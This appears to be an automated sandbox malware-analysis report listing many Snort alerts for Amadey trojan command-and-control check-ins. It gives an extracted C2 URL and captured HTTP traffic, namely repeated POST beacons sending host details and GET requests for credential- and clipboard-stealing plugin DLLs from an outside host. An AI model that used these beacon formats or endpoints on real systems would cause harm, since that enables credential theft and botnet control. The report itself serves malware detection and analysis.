                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50056 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50057 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50058 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50059 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50060 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50061 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50062 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50063 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50064 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50065 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50066 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50067 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50068 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50069 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50070 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50071 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50072 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50073 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50074 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50075 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50076 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50077 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50078 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50079 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50080 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50081 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50082 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50083 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50084 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50085 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50086 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50087 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50088 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50089 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50090 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50091 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50092 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50093 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50094 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50095 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50096 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50097 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50098 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50099 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50100 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50101 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50102 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50103 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50104 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50105 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50106 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50107 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50108 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50109 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50110 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50111 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50112 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50113 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50114 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50115 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50116 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50117 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50118 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50119 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50120 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50121 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50122 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50123 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50124 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50125 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50126 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50127 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50128 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50129 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50130 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50131 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50132 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50133 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50134 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50135 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50136 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50137 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50138 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50139 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50140 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50141 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50142 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50143 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50144 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50145 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50146 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50147 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50148 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50149 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50150 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50151 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50152 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50153 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50154 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50155 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50156 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50157 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50158 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50159 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50160 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50161 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50162 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50163 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50164 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50165 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50166 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50167 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50168 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50169 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50170 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50171 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50172 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50173 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50174 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50175 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50176 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50177 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50178 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50179 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50180 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50181 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50182 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50183 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50184 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50185 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50186 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50187 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50188 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50189 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50190 -> 62.204.41.4:80
                          Source: Malware configuration extractorURLs: 62.204.41.4/Gol478Ns/index.php
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: GET /Gol478Ns/Plugins/cred64.dll HTTP/1.1Host: 62.204.41.4
                          Source: global trafficHTTP traffic detected: GET /Gol478Ns/Plugins/clip64.dll HTTP/1.1Host: 62.204.41.4
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
